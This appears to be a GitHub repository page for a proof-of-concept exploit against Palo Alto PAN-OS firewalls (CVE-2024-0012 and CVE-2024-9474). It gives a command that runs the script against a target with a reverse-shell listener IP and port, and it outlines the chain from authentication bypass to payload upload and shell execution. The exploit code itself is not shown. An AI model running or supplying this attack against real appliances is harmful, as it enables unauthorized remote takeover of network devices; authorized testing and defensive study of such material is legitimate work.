Skip to content

This PoC is targeting vulnerabilities in Palo Alto PAN-OS, specifically CVE-2024-0012 and CVE-2024-9474. This script automates the exploitation process, including payload creation, chunked delivery, and seamless command execution.

Notifications You must be signed in to change notification settings

TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

🚀 CVE-2024-0012 & CVE-2024-9474 (Palo Alto PAN-OS) Exploit 🔐

Palo Alto PAN-OS Exploit Type

🛡️ Description

This Proof-of-Concept (PoC) script targeting vulnerabilities in Palo Alto PAN-OS, specifically CVE-2024-0012 and CVE-2024-9474 by automating the exploitation process, including autentication bypass, payload creation, chunked delivery, and seamless command execution.

⚠️ This script is for educational and authorized penetration testing purposes only. Unauthorized use is illegal.


🔍 Vulnerabilities Addressed

CVE-2024-0012

  • Type: Authentication Bypass
  • Impact: Enables unauthorized access to administrative interfaces.
  • Severity: 🚨 Critical

CVE-2024-9474

  • Type: Command Execution & Privilege Escalation
  • Impact: Allows remote attackers to execute arbitrary commands.
  • Severity: 🔥 Medium

🧑‍💻 Usage

🛠️ Clone the Repository

git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC

🚀 Run the Script

python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

Arguments:

  • <TARGET_URL>: The target URL, including http or https.
  • <LISTENER_IP>: Your IP address for the reverse shell listener.
  • <LISTENER_PORT>: The port for the reverse shell listener.

💡 Example

python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444

💻 Exploit Demo

Screen.Recording.2024-12-12.at.12.03.59.AM.mov

⚙️ How It Works

Get the full breakdown and technical insights into this PoC from this Medium Write-up!

  1. 🔍 Checks Vulnerability: Ensures the target is vulnerable to CVE-2024-0012 and CVE-2024-9474.
  2. 🛡️ Extracts PHPSESSID: Retrieves a session ID for further exploitation.
  3. Generates Payload: Creates a double-encoded reverse shell payload.
  4. 📦 Uploads Chunks: Sends payload chunks to the target server.
  5. 🔗 Combines Payload: Reconstructs the payload on the target system.
  6. Executes Command: Decodes and executes the reverse shell.

⚠️ Legal Disclaimer

This PoC is intended for educational purposes and authorized security testing only. Unauthorized use of this tool is strictly prohibited. The authors are not responsible for any misuse or damage caused by this tool.


🧑‍🎓 Author

ghostxploiter

About

This PoC is targeting vulnerabilities in Palo Alto PAN-OS, specifically CVE-2024-0012 and CVE-2024-9474. This script automates the exploitation process, including payload creation, chunked delivery, and seamless command execution.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages